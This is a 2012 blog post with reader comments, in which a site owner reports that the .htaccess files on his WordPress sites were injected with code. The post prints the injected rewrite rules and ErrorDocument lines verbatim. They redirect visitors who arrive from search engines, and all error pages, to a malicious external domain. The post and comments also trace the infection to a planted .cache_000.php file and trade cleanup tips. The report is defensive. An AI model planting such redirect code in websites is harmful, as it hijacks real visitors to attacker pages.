Wednesday, July 4, 2012

Sites Hacked? .htaccess files were code injected

(Previous Title: "Inmotion Hosting Hacked?")
At 7/3/2012 11:25:22 PM, my existing .htaccess files were injected with the following:
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteCond %{HTTP_REFERER} ^.*(google|ask|yahoo|youtube|wikipedia|excite|altavista|msn|aol|goto|infoseek|lycos|search|bing|dogpile|facebook|twitter|live|myspace|linkedin|flickr)\.(.*)
RewriteRule ^(.*)$ http://2012medis.ru/cocumber?4 [R=301,L]
</IfModule>
and
ErrorDocument 400 http://2012medis.ru/cocumber?4
ErrorDocument 401 http://2012medis.ru/cocumber?4
ErrorDocument 403 http://2012medis.ru/cocumber?4
ErrorDocument 404 http://2012medis.ru/cocumber?4
ErrorDocument 500 http://2012medis.ru/cocumber?4
I corrected the problem by removing the injected code from my existing files and deleting the one's that were added which I identified quickly as being 1.57 KB (1,608 bytes)

-UPDATE-
It may be related to a file called ".cache_000.php" injected via a vulnerability with Wordpress. Look in your /wp-content/uploads/ directory for .cache_000.php
For me the file had the same timestamp as some of the .htaccess files did.

-UPDATE-
I updated my title to un-point the finger at Inmotion Hosting... the problem does appear to be fixed since I deleted that file and updated Wordpress.

-UPDATE-  
Update Wordpress or make the .cache_000.php file not accessible

2 comments:

  1. I got hit by the same hack. The hackers screwed up and mis-spelled a URL (starting it with "htttp"!), which caused my whole WP site to lock up. I cleaned it all up (or so I thought); 24 hours later it was hacked again. Rinse, repeat, watch the logs... and this morning it was hacked again. This time I could identify the exact time of the hack, and checking the logs I saw the reference to the ".cache_000.php" file you mention.

    The obvious question is, how did the file get into my uploads directory? And how can I tell PHP not to execute anything from uploads?

    ReplyDelete
    Replies
    1. Hey Geoff, sorry for the delay in responding... really your best option is to update Wordpress. If you can't do that, you could make your .htaccess redirect requests to it. If you have access to change your file permissions, I think you could do 770 without breaking it's legitimate use.

      Delete